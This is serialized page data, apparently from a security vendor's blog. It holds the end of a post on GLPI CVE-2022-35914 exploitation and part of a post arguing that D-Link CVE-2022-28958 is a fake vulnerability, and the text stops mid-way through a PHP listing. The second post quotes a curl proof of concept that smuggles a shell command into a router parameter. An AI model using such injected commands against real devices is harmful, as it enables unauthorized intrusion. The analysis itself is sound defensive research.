",[47,112472,112474],{"href":106820,"rel":112473},[51],"honeypot dashboard"," that lists all the vulnerabilities they’ve seen exploited recently. 
While not hugely exploited, we can see CVE-2022-35914 exploitation attempts remain ongoing.",[18,112477,112478],{},[68,112479],{":width":10862,"alt":112480,"src":112481},"shadowserver","\u002Fblog\u002Fglpi-exploitation\u002Fshadowserver-cve-2022-35914.png",[18,112483,112484,112485,112489,112490,112493,112494,59],{},"The other source we can turn to is GreyNoise. GreyNoise doesn’t have a ",[47,112486,55284],{"href":112487,"rel":112488},"https:\u002F\u002Fviz.greynoise.io\u002Fcheat-sheet\u002Ftags",[51]," for CVE-2022-35914, but we can query the API to get a list of malicious IP addresses attempting to reach the ",[886,112491,112492],{},"htmLawedTest.php"," file containing the ",[47,112495,112498],{"href":112496,"rel":112497},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=raw_data.web.paths%3A%22htmlawed%2Fhtmlawed%2FhtmLawedTest.php%22%20classification%3Amalicious",[51],"exploited debug functionality",[18,112500,112501],{},[68,112502],{":width":10862,"alt":112503,"src":112504},"greynoise","\u002Fblog\u002Fglpi-exploitation\u002Fglpi-greynoise.png",[18,112506,112507,112508,112513,112514,112516,112517,112520],{},"Both ShadowServer and GreyNoise indicate that exploitation attempts in the wild are ongoing. But are there still vulnerable hosts on the internet to exploit? To answer that question, we scanned the GLPI hosts that Shodan has indexed. The ",[47,112509,112512],{"href":112510,"rel":112511},"https:\u002F\u002Fgithub.com\u002Fglpi-project\u002Fglpi\u002Fcommit\u002F5f5c60280b0577392d722662461638b961f2742",[51],"fix"," for CVE-2022-35914 was to remove ",[886,112515,112492],{}," from GLPI, as it was for test purposes only. Determining if a host is vulnerable is as simple as seeing if they still have ",[886,112518,112519],{},"htmLawedTest.php"," or not. 
We found only ~10% of internet-facing GLPI servers are currently vulnerable.",[1925,112522,112523],{},[18,112524,112525],{},"Internet-facing GLPI Servers Affected by CVE-2022-35914",[78559,112527],{":labels":112528,":values":112529},"[\"Vulnerable\",\"Not Vulnerable\"]","[9.9,90.1]",[18,112531,112532,112533,112538],{},"Of course, the fact that there are hundreds of exploitable GLPI hosts is likely still interesting to attackers. The software is likely associated with a business and critical data. In fact, the software reminds us of Zoho ManageEngine Service Desk Plus, which was extensively exploited by ",[47,112534,112537],{"href":112535,"rel":112536},"https:\u002F\u002Fwww.cisa.gov\u002Fuscert\u002Fncas\u002Falerts\u002Faa21-336a",[51],"APT"," in 2021.",[1920,112540,1903],{"id":1902},[18,112542,112543],{},"Prioritizing the remediation of vulnerabilities exploited in the wild is a solid vulnerability management strategy. But relying on a single source of information with an incomplete dataset could result in disaster. In this blog, we presented a vulnerability in crucial business software that has been exploited in the wild, but hasn’t been included in the CISA KEV Catalog. This is just one example of an overlooked vulnerability. 
There are many others, and we’ll visit more in the future.",[18,112545,112546,112547,95208],{},"For more information on vulnerabilities exploited in the wild, but not in CISA KEV, register for a VulnCheck account today by loading ",[47,112548,78319],{"href":78319,"rel":112549},[51],[2901,112551,112552],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: 
var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":112554},[],"2022-12-21","Taking a look at the timeline leading up to exploitation of CVE-2022-35914 and the current state of attacks in the wild.",{"slug":112558},"glpi-exploitation","\u002Fblog\u002Fglpi-exploitation",{"title":112222,"description":112556},"blog\u002Fglpi-exploitation",[242,23275],"zXey5154tM1NiMq5VPq540Qv1sHdqUMFqT69Oj_9Wps",{"id":112565,"title":112566,"articles":112567,"authors":112575,"body":112577,"date":62139,"description":115660,"extension":234,"image":7,"link":7,"meta":115661,"navigation":237,"path":115664,"seo":115665,"series":7,"stem":115666,"subtype":7,"tags":7,"__hash__":115667},"blog\u002Fblog\u002Fmoobot-uses-fake-vulnerability.md","Moobot Uses a Fake Vulnerability",[112568,112572],{"title":112569,"source":3494,"link":112570,"date":112571},"Risky Biz News: Disgruntled member doxes and extorts URSNIF 
gang","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-disgruntled-member","2022-12-11",{"title":112573,"source":3481,"link":112574,"date":61897},"A year on, CISA realizes debunked vuln actually a dud and removes it from must-patch list","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F12\u002F06\u002Fdud_cve_removed\u002F",[112576],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":112578,"toc":115658},[112579,112581,112604,112625,112653,112677,112685,112694,112698,112707,112712,112718,112976,112982,112987,113005,113028,113064,113597,113604,113609,113628,113653,113659,113663,113671,113676,113679,113703,113754,113761,113785,113869,113872,113875,113899,113947,113959,114009,114023,114047,114142,114154,114178,114270,114276,114280,114289,114314,114341,114383,114403,114467,114485,114491,114494,114498,114511,114756,114759,114784,115232,115239,115369,115381,115406,115482,115498,115502,115508,115513,115524,115529,115535,115537,115540,115560,115563,115568,115572,115579,115655],[1920,112580,11648],{"id":11647},[18,112582,112583,112584,112589,112590,112593,112594,112598,112599,112603],{},"On September 8, 2022, ",[47,112585,112588],{"href":112586,"rel":112587},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2022-28958",[51],"CVE-2022-28958"," was added to CISA's ",[47,112591,10993],{"href":2864,"rel":112592},[51],". A  ",[47,112595,5061],{"href":112596,"rel":112597},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fmoobot-d-link-devices\u002F",[51]," published a couple days prior said the vulnerability was being exploited by ",[47,112600,24605],{"href":112601,"rel":112602},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.moobot",[51],", a Mirai-like botnet. 
However, this vulnerability has never been exploited in the wild, because CVE-2022-28958 isn’t a real vulnerability.",[18,112605,112606,112607,112612,112613,112618,112619,112624],{},"On April 6, 2022, GitHub user ",[47,112608,112611],{"href":112609,"rel":112610},"https:\u002F\u002Fgithub.com\u002Fshijin0925",[51],"shijn0925"," published ",[47,112614,112617],{"href":112615,"rel":112616},"https:\u002F\u002Fgithub.com\u002Fshijin0925\u002FIOT\u002Ftree\u002Fmaster\u002FDIR816",[51],"four vulnerabilities"," affecting the end-of-life SOHO router D-Link ",[47,112620,112623],{"href":112621,"rel":112622},"https:\u002F\u002Flegacy.us.dlink.com\u002Fpages\u002Fproduct.aspx?id=1e9adeae036d4724b5fbc82325f93ae8",[51],"DIR-816L",". The vulnerability details were published in markdown files named 1.md through 4.md. MITRE assigned the following CVE identifiers for the researcher’s findings:",[22,112626,112627,112635,112638,112645],{},[25,112628,112629,112630],{},"1.md - ",[47,112631,112634],{"href":112632,"rel":112633},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28955",[51],"CVE-2022-28955",[25,112636,112637],{},"2.md - None assigned",[25,112639,112640,112641],{},"3.md - ",[47,112642,112588],{"href":112643,"rel":112644},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28958",[51],[25,112646,112647,112648],{},"4.md - ",[47,112649,112652],{"href":112650,"rel":112651},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-28956",[51],"CVE-2022-28956",[18,112654,112655,112656,1246,112661,1246,112666,1255,112671,112676],{},"This blog is predominantly about CVE-2022-28958 not being a real vulnerability, but it’s interesting to note that the other two findings likely shouldn’t have received CVE either. CVE-2022-28955 (missing authentication) appears to be as-designed functionality with low or no security impact. 
CVE-2022-28956 (authentication bypass) is a real security issue, but a duplicate of four other CVE: ",[47,112657,112660],{"href":112658,"rel":112659},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-15894",[51],"CVE-2020-15894",[47,112662,112665],{"href":112663,"rel":112664},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-9376",[51],"CVE-2020-9376",[47,112667,112670],{"href":112668,"rel":112669},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2019-17506",[51],"CVE-2019-17506",[47,112672,112675],{"href":112673,"rel":112674},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2018-7034",[51],"CVE-2018-7034",". Amazingly, we found those five CVE don’t cover all affected devices. The authentication bypass is useful to us later in the blog, so we ended up creating a list of affected devices (see addendum at the end of the blog).",[18,112678,112679,112680,112684],{},"All of this is worth discussing, not just because CVE-2022-28958 found its way into the KEV Catalog, but because there are a good number of these devices on the internet. ",[47,112681,41731],{"href":112682,"rel":112683},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22D-LINK+SYSTEMS%2C+INC.%22+title%3A%22WIRELESS+ROUTER%22+title%3A%22HOME%22",[51]," has indexed around 6,000 of them:",[18,112686,112687,112691,112693],{},[68,112688],{":width":10862,"alt":112689,"src":112690},"censys","\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fshodan.png",[1823,112692],{},"\n ",[1920,112695,112697],{"id":112696},"moobot-and-cve-2022-28958","Moobot and CVE-2022-28958",[18,112699,112700,112701,112706],{},"Let's look at shijin0925's original ",[47,112702,112705],{"href":112703,"rel":112704},"https:\u002F\u002Fgithub.com\u002Fshijin0925\u002FIOT\u002Fblob\u002Fmaster\u002FDIR816\u002F3.md",[51],"disclosure",". 
The following vulnerability description is provided (note that we didn't correct any language):",[1925,112708,112709],{},[18,112710,112711],{},"DIR816L_FW206b01 shareport.php has an issue that attackers can use it to execute command via \"value\" parameter.",[18,112713,112714,112715,4606],{},"The disclosure also includes this code snippet from ",[886,112716,112717],{},"shareport.php",[1354,112719,112721],{"className":1367,"code":112720,"language":1369,"meta":219,"style":219},"if ($AUTHORIZED_GROUP \u003C 0)\n{\n    $result = \"FAIL\";\n    $reason = i18n(\"Permission deny. The user is unauthorized.\");\n}\nelse\n{\n    if ($_POST[\"action\"] == \"sethostname\")\n    {\n        $value = $_POST[\"value\"];\n        if ($value != \"\")\n        {\n            set(\"\u002Fdevice\u002Fgw_name\", $value);\n            event(\"SHAREPORT.SETGWNAME\");\n            $RESULT = \"OK\";\n            $REASON = \"\";                    \n        }\n    }    \n    else    fail(i18n(\"Unknown ACTION!\"));\n}\n",[886,112722,112723,112738,112742,112759,112782,112786,112791,112795,112824,112828,112850,112864,112868,112890,112906,112924,112939,112943,112949,112972],{"__ignoreMap":219},[1373,112724,112725,112727,112729,112732,112734,112736],{"class":1375,"line":1376},[1373,112726,4637],{"class":4636},[1373,112728,47425],{"class":1383},[1373,112730,112731],{"class":4640},"AUTHORIZED_GROUP 
",[1373,112733,11852],{"class":1397},[1373,112735,5557],{"class":5467},[1373,112737,11875],{"class":1383},[1373,112739,112740],{"class":1375,"line":220},[1373,112741,8904],{"class":1383},[1373,112743,112744,112746,112748,112750,112752,112755,112757],{"class":1375,"line":1266},[1373,112745,7362],{"class":1383},[1373,112747,100518],{"class":4640},[1373,112749,5417],{"class":1397},[1373,112751,4883],{"class":1387},[1373,112753,112754],{"class":1391},"FAIL",[1373,112756,183],{"class":1387},[1373,112758,4912],{"class":1383},[1373,112760,112761,112763,112766,112768,112771,112773,112775,112778,112780],{"class":1375,"line":1852},[1373,112762,7362],{"class":1383},[1373,112764,112765],{"class":4640},"reason ",[1373,112767,5417],{"class":1397},[1373,112769,112770],{"class":7297}," i18n",[1373,112772,1384],{"class":1383},[1373,112774,183],{"class":1387},[1373,112776,112777],{"class":1391},"Permission deny. The user is unauthorized.",[1373,112779,183],{"class":1387},[1373,112781,4680],{"class":1383},[1373,112783,112784],{"class":1375,"line":4692},[1373,112785,1855],{"class":1383},[1373,112787,112788],{"class":1375,"line":4724},[1373,112789,112790],{"class":4636},"else\n",[1373,112792,112793],{"class":1375,"line":4756},[1373,112794,8904],{"class":1383},[1373,112796,112797,112799,112801,112803,112805,112807,112809,112811,112813,112815,112817,112820,112822],{"class":1375,"line":4768},[1373,112798,4695],{"class":4636},[1373,112800,47425],{"class":1383},[1373,112802,100083],{"class":4640},[1373,112804,7035],{"class":1383},[1373,112806,183],{"class":1387},[1373,112808,100044],{"class":1391},[1373,112810,183],{"class":1387},[1373,112812,15050],{"class":1383},[1373,112814,16406],{"class":1397},[1373,112816,4883],{"class":1387},[1373,112818,112819],{"class":1391},"sethostname",[1373,112821,183],{"class":1387},[1373,112823,11875],{"class":1383},[1373,112825,112826],{"class":1375,"line":4792},[1373,112827,9613],{"class":1383},[1373,112829,112830,112832,112834,112836,112838,112840,112842,11
2844,112846,112848],{"class":1375,"line":4798},[1373,112831,4727],{"class":1383},[1373,112833,100300],{"class":4640},[1373,112835,5417],{"class":1397},[1373,112837,4656],{"class":1383},[1373,112839,100083],{"class":4640},[1373,112841,7035],{"class":1383},[1373,112843,183],{"class":1387},[1373,112845,85021],{"class":1391},[1373,112847,183],{"class":1387},[1373,112849,34699],{"class":1383},[1373,112851,112852,112854,112856,112858,112860,112862],{"class":1375,"line":4806},[1373,112853,9773],{"class":4636},[1373,112855,47425],{"class":1383},[1373,112857,100300],{"class":4640},[1373,112859,15677],{"class":1397},[1373,112861,16579],{"class":1387},[1373,112863,11875],{"class":1383},[1373,112865,112866],{"class":1375,"line":4817},[1373,112867,9788],{"class":1383},[1373,112869,112870,112873,112875,112877,112880,112882,112884,112886,112888],{"class":1375,"line":4825},[1373,112871,112872],{"class":7297},"            set",[1373,112874,1384],{"class":1383},[1373,112876,183],{"class":1387},[1373,112878,112879],{"class":1391},"\u002Fdevice\u002Fgw_name",[1373,112881,183],{"class":1387},[1373,112883,5437],{"class":1383},[1373,112885,4656],{"class":1383},[1373,112887,85021],{"class":4640},[1373,112889,4680],{"class":1383},[1373,112891,112892,112895,112897,112899,112902,112904],{"class":1375,"line":4835},[1373,112893,112894],{"class":7297},"            event",[1373,112896,1384],{"class":1383},[1373,112898,183],{"class":1387},[1373,112900,112901],{"class":1391},"SHAREPORT.SETGWNAME",[1373,112903,183],{"class":1387},[1373,112905,4680],{"class":1383},[1373,112907,112908,112910,112913,112915,112917,112920,112922],{"class":1375,"line":4843},[1373,112909,47435],{"class":1383},[1373,112911,112912],{"class":4640},"RESULT 
",[1373,112914,5417],{"class":1397},[1373,112916,4883],{"class":1387},[1373,112918,112919],{"class":1391},"OK",[1373,112921,183],{"class":1387},[1373,112923,4912],{"class":1383},[1373,112925,112926,112928,112931,112933,112935,112937],{"class":1375,"line":4849},[1373,112927,47435],{"class":1383},[1373,112929,112930],{"class":4640},"REASON ",[1373,112932,5417],{"class":1397},[1373,112934,16579],{"class":1387},[1373,112936,39663],{"class":1383},[1373,112938,108366],{"class":4640},[1373,112940,112941],{"class":1375,"line":4877},[1373,112942,9861],{"class":1383},[1373,112944,112945,112947],{"class":1375,"line":4915},[1373,112946,28032],{"class":1383},[1373,112948,47181],{"class":4640},[1373,112950,112951,112953,112956,112958,112961,112963,112965,112968,112970],{"class":1375,"line":4931},[1373,112952,7643],{"class":4636},[1373,112954,112955],{"class":7297},"    fail",[1373,112957,1384],{"class":1383},[1373,112959,112960],{"class":7297},"i18n",[1373,112962,1384],{"class":1383},[1373,112964,183],{"class":1387},[1373,112966,112967],{"class":1391},"Unknown ACTION!",[1373,112969,183],{"class":1387},[1373,112971,1413],{"class":1383},[1373,112973,112974],{"class":1375,"line":4947},[1373,112975,1855],{"class":1383},[18,112977,112978,112979,4606],{},"And the disclosure specifically calls out the use of ",[886,112980,112981],{},"set()",[1925,112983,112984],{},[18,112985,112986],{},"As you can see there is not enough filter with paramter \"value\",it just passed to function set which execute command directly.",[18,112988,112989,112990,112993,112994,50864,112996,112998,112999,113001,113002,113004],{},"According to this disclosure, the vulnerability is the result of an attacker-controlled ",[886,112991,112992],{},"$value"," being passed into ",[886,112995,112981],{},[886,112997,112717],{},". 
Allegedly, ",[886,113000,112981],{}," will \"execute command directly.\" The disclosure also contains a ",[886,113003,1557],{},"-based proof of concept:",[100588,113006,113007],{},[1354,113008,113010],{"className":31740,"code":113009,"language":2186,"meta":219,"style":219},"curl http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php -d  \"action=sethostname&value=%26%20ls%20-la%20%26%0aAUTHORIZED_GROUP=1\"\n",[886,113011,113012],{"__ignoreMap":219},[1373,113013,113014,113016,113019,113021,113023,113026],{"class":1375,"line":1376},[1373,113015,1557],{"class":2206},[1373,113017,113018],{"class":1391}," http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php",[1373,113020,87473],{"class":2209},[1373,113022,23732],{"class":1387},[1373,113024,113025],{"class":1391},"action=sethostname&value=%26%20ls%20-la%20%26%0aAUTHORIZED_GROUP=1",[1373,113027,19057],{"class":1387},[18,113029,113030,113031,113033,113034,113036,113037,113040,113041,113043,113044,113047,113048,113050,113051,10515,113053,10515,113055,113057,113058,113061,113062,4606],{},"The disclosure doesn’t contain the output of the ",[886,113032,1557],{}," request, and it doesn't provide any other evidence the router executed the provided ",[886,113035,85021],{}," parameter (",[886,113038,113039],{},"& ls -la &","). The reader is just expected to accept the command works. But, the proof of concept has a glaring error. It doesn’t send the “malicious” request to ",[886,113042,112717],{}," where the alleged vulnerable code resides. The request is sent to ",[886,113045,113046],{},"getcfg.php"," an entirely different and unrelated endpoint. And, perhaps most importantly, ",[886,113049,113046],{}," doesn't have logic for handling the provided ",[886,113052,100044],{},[1131,113054,4536],{},[886,113056,85021],{}," parameters, so this proof of concept would have ",[1131,113059,113060],{},"no effect"," on the system. But don’t take our word for it. 
Here is ",[886,113063,113046],{},[1354,113065,113067],{"className":1367,"code":113066,"language":1369,"meta":219,"style":219},"if ($_POST[\"CACHE\"] == \"true\")\n{\n    echo dump(1, \"\u002Fruntime\u002Fsession\u002F\".$SESSION_UID.\"\u002Fpostxml\");\n}\nelse\n{\n    if($AUTHORIZED_GROUP \u003C 0)\n    {\n        \u002F* not a power user, return error message *\u002F\n        echo \"\\t\u003Cresult>FAILED\u003C\u002Fresult>\\n\";\n        echo \"\\t\u003Cmessage>Not authorized\u003C\u002Fmessage>\\n\";\n    }\n    else\n    {\n        \u002F* cut_count() will return 0 when no or only one token. *\u002F\n        $SERVICE_COUNT = cut_count($_POST[\"SERVICES\"], \",\");\n        TRACE_debug(\"GETCFG: got \".$SERVICE_COUNT.\" service(s): \".$_POST[\"SERVICES\"]);\n        $SERVICE_INDEX = 0;\n        while ($SERVICE_INDEX \u003C $SERVICE_COUNT)\n        {\n            $GETCFG_SVC = cut($_POST[\"SERVICES\"], $SERVICE_INDEX, \",\");\n            TRACE_debug(\"GETCFG: serivce[\".$SERVICE_INDEX.\"] = \".$GETCFG_SVC);\n            if ($GETCFG_SVC!=\"\")\n            {\n                $file = \"\u002Fhtdocs\u002Fwebinc\u002Fgetcfg\u002F\".$GETCFG_SVC.\".xml.php\";\n                \u002F* GETCFG_SVC will be passed to the child process. 
*\u002F\n                if (isfile($file)==\"1\")\n                {\n                        AES_Encrypt_DBnode($GETCFG_SVC, \"Encrypt\");\n                        dophp(\"load\", $file);\n                        AES_Encrypt_DBnode($GETCFG_SVC, \"Decrypt\");\n                }\n            }\n            $SERVICE_INDEX++;\n        }\n    }\n}\n",[886,113068,113069,113098,113102,113140,113144,113148,113152,113166,113170,113175,113194,113211,113215,113220,113224,113229,113264,113310,113323,113340,113344,113385,113423,113437,113441,113473,113478,113503,113507,113527,113548,113567,113571,113575,113585,113589,113593],{"__ignoreMap":219},[1373,113070,113071,113073,113075,113077,113079,113081,113084,113086,113088,113090,113092,113094,113096],{"class":1375,"line":1376},[1373,113072,4637],{"class":4636},[1373,113074,47425],{"class":1383},[1373,113076,100083],{"class":4640},[1373,113078,7035],{"class":1383},[1373,113080,183],{"class":1387},[1373,113082,113083],{"class":1391},"CACHE",[1373,113085,183],{"class":1387},[1373,113087,15050],{"class":1383},[1373,113089,16406],{"class":1397},[1373,113091,4883],{"class":1387},[1373,113093,10874],{"class":1391},[1373,113095,183],{"class":1387},[1373,113097,11875],{"class":1383},[1373,113099,113100],{"class":1375,"line":220},[1373,113101,8904],{"class":1383},[1373,113103,113104,113106,113109,113111,113113,113115,113117,113120,113122,113124,113126,113129,113131,113133,113136,113138],{"class":1375,"line":1266},[1373,113105,94772],{"class":1379},[1373,113107,113108],{"class":7297}," 
dump",[1373,113110,1384],{"class":1383},[1373,113112,467],{"class":5467},[1373,113114,5437],{"class":1383},[1373,113116,4883],{"class":1387},[1373,113118,113119],{"class":1391},"\u002Fruntime\u002Fsession\u002F",[1373,113121,183],{"class":1387},[1373,113123,59],{"class":1397},[1373,113125,4644],{"class":1383},[1373,113127,113128],{"class":4640},"SESSION_UID",[1373,113130,59],{"class":1397},[1373,113132,183],{"class":1387},[1373,113134,113135],{"class":1391},"\u002Fpostxml",[1373,113137,183],{"class":1387},[1373,113139,4680],{"class":1383},[1373,113141,113142],{"class":1375,"line":1852},[1373,113143,1855],{"class":1383},[1373,113145,113146],{"class":1375,"line":4692},[1373,113147,112790],{"class":4636},[1373,113149,113150],{"class":1375,"line":4724},[1373,113151,8904],{"class":1383},[1373,113153,113154,113156,113158,113160,113162,113164],{"class":1375,"line":4756},[1373,113155,4695],{"class":4636},[1373,113157,34467],{"class":1383},[1373,113159,112731],{"class":4640},[1373,113161,11852],{"class":1397},[1373,113163,5557],{"class":5467},[1373,113165,11875],{"class":1383},[1373,113167,113168],{"class":1375,"line":4768},[1373,113169,9613],{"class":1383},[1373,113171,113172],{"class":1375,"line":4792},[1373,113173,113174],{"class":4630},"        \u002F* not a power user, return error message *\u002F\n",[1373,113176,113177,113180,113182,113185,113188,113190,113192],{"class":1375,"line":4798},[1373,113178,113179],{"class":1379},"        echo",[1373,113181,4883],{"class":1387},[1373,113183,113184],{"class":2326},"\\t",[1373,113186,113187],{"class":1391},"\u003Cresult>FAILED\u003C\u002Fresult>",[1373,113189,8943],{"class":2326},[1373,113191,183],{"class":1387},[1373,113193,4912],{"class":1383},[1373,113195,113196,113198,113200,113202,113205,113207,113209],{"class":1375,"line":4806},[1373,113197,113179],{"class":1379},[1373,113199,4883],{"class":1387},[1373,113201,113184],{"class":2326},[1373,113203,113204],{"class":1391},"\u003Cmessage>Not 
authorized\u003C\u002Fmessage>",[1373,113206,8943],{"class":2326},[1373,113208,183],{"class":1387},[1373,113210,4912],{"class":1383},[1373,113212,113213],{"class":1375,"line":4817},[1373,113214,4795],{"class":1383},[1373,113216,113217],{"class":1375,"line":4825},[1373,113218,113219],{"class":4636},"    else\n",[1373,113221,113222],{"class":1375,"line":4835},[1373,113223,9613],{"class":1383},[1373,113225,113226],{"class":1375,"line":4843},[1373,113227,113228],{"class":4630},"        \u002F* cut_count() will return 0 when no or only one token. *\u002F\n",[1373,113230,113231,113233,113236,113238,113241,113243,113245,113247,113249,113252,113254,113256,113258,113260,113262],{"class":1375,"line":4849},[1373,113232,4727],{"class":1383},[1373,113234,113235],{"class":4640},"SERVICE_COUNT ",[1373,113237,5417],{"class":1397},[1373,113239,113240],{"class":7297}," cut_count",[1373,113242,34467],{"class":1383},[1373,113244,100083],{"class":4640},[1373,113246,7035],{"class":1383},[1373,113248,183],{"class":1387},[1373,113250,113251],{"class":1391},"SERVICES",[1373,113253,183],{"class":1387},[1373,113255,27625],{"class":1383},[1373,113257,4883],{"class":1387},[1373,113259,5437],{"class":1391},[1373,113261,183],{"class":1387},[1373,113263,4680],{"class":1383},[1373,113265,113266,113269,113271,113273,113276,113278,113280,113282,113285,113287,113289,113292,113294,113296,113298,113300,113302,113304,113306,113308],{"class":1375,"line":4877},[1373,113267,113268],{"class":7297},"        TRACE_debug",[1373,113270,1384],{"class":1383},[1373,113272,183],{"class":1387},[1373,113274,113275],{"class":1391},"GETCFG: got ",[1373,113277,183],{"class":1387},[1373,113279,59],{"class":1397},[1373,113281,4644],{"class":1383},[1373,113283,113284],{"class":4640},"SERVICE_COUNT",[1373,113286,59],{"class":1397},[1373,113288,183],{"class":1387},[1373,113290,113291],{"class":1391}," service(s): 
",[1373,113293,183],{"class":1387},[1373,113295,59],{"class":1397},[1373,113297,4644],{"class":1383},[1373,113299,100083],{"class":4640},[1373,113301,7035],{"class":1383},[1373,113303,183],{"class":1387},[1373,113305,113251],{"class":1391},[1373,113307,183],{"class":1387},[1373,113309,34850],{"class":1383},[1373,113311,113312,113314,113317,113319,113321],{"class":1375,"line":4915},[1373,113313,4727],{"class":1383},[1373,113315,113316],{"class":4640},"SERVICE_INDEX ",[1373,113318,5417],{"class":1397},[1373,113320,5557],{"class":5467},[1373,113322,4912],{"class":1383},[1373,113324,113325,113328,113330,113332,113334,113336,113338],{"class":1375,"line":4931},[1373,113326,113327],{"class":4636},"        while",[1373,113329,47425],{"class":1383},[1373,113331,113316],{"class":4640},[1373,113333,11852],{"class":1397},[1373,113335,4656],{"class":1383},[1373,113337,113284],{"class":4640},[1373,113339,11875],{"class":1383},[1373,113341,113342],{"class":1375,"line":4947},[1373,113343,9788],{"class":1383},[1373,113345,113346,113348,113351,113353,113356,113358,113360,113362,113364,113366,113368,113370,113372,113375,113377,113379,113381,113383],{"class":1375,"line":4952},[1373,113347,47435],{"class":1383},[1373,113349,113350],{"class":4640},"GETCFG_SVC ",[1373,113352,5417],{"class":1397},[1373,113354,113355],{"class":7297}," 
cut",[1373,113357,34467],{"class":1383},[1373,113359,100083],{"class":4640},[1373,113361,7035],{"class":1383},[1373,113363,183],{"class":1387},[1373,113365,113251],{"class":1391},[1373,113367,183],{"class":1387},[1373,113369,27625],{"class":1383},[1373,113371,4656],{"class":1383},[1373,113373,113374],{"class":4640},"SERVICE_INDEX",[1373,113376,5437],{"class":1383},[1373,113378,4883],{"class":1387},[1373,113380,5437],{"class":1391},[1373,113382,183],{"class":1387},[1373,113384,4680],{"class":1383},[1373,113386,113387,113390,113392,113394,113397,113399,113401,113403,113405,113407,113409,113412,113414,113416,113418,113421],{"class":1375,"line":6776},[1373,113388,113389],{"class":7297},"            TRACE_debug",[1373,113391,1384],{"class":1383},[1373,113393,183],{"class":1387},[1373,113395,113396],{"class":1391},"GETCFG: serivce[",[1373,113398,183],{"class":1387},[1373,113400,59],{"class":1397},[1373,113402,4644],{"class":1383},[1373,113404,113374],{"class":4640},[1373,113406,59],{"class":1397},[1373,113408,183],{"class":1387},[1373,113410,113411],{"class":1391},"] = 
